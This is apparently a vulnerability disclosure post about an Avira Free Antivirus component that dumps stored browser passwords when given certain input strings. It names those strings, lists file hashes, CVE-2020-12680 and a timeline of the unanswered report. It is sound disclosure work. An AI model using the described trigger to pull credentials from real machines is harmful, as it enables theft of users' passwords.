Avira Free Antivirus password collector


What if I told you, that the only job of one of the components of Avira Free Antivirus is to collect your browser passwords and print them to console?

Investigation

There is a company called Avira GmbH & Co. KG. The company makes various information security solutions for home and business.
One of the components from Avira Free Antivirus, that was not stated in the description, is capable of collecting user’s stored credentials.
Lets check the file “%ProgramFiles%\Avira\Launcher\Avira.PWM.NativeMessaging.exe”. The binary is written for .NET platform and is not obfuscated, so lets open it in dnspy and check what it does.
Avira.PWM.NativeMessaging.exe” is a console program that reads user input and performs actions based on it.
The function “Read” is used to retrieve user input from stdin stream and pass it to “ProcessMessage” function. If user input “fetchChromePasswords” or “fetchCredentials” then it calls “RetrievBrowserCredentials” function.




The “RetrievBrowserCredentials” function collects all user’s stored credentials for the set of browsers (Chrome, Firefox, Opera, Edge) and saves it into json object.

After that it prints the JSON-string to stdout.


The problem

  • The binary collects user’s stored credentials.
  • The binary is signed with Avira’s digital signature.
  • The binary does not verify the program that calls it.
  • The binary is a standalone program.

IoC

SHA1: 13c95241e671b98342dba51741fd02621768ecd5
SHA1: d43ee0d99c36b782a909884fc4f18a553e5b94b
SHA1: 3a6bd77f734da9cdeb7fb8da69a12be1445b2183
  
CVE-2020-12680

Timeline

07.04.2020: The problem was reported to support@avira.com and info@avira.com
06.05.2020: No response from Avira. Full disclosure.

Thanks

Translation from russian by Pavel Maksyutin.
Thanks to the https://twitter.com/malwrhunterteam for looking for other versions.


Комментарии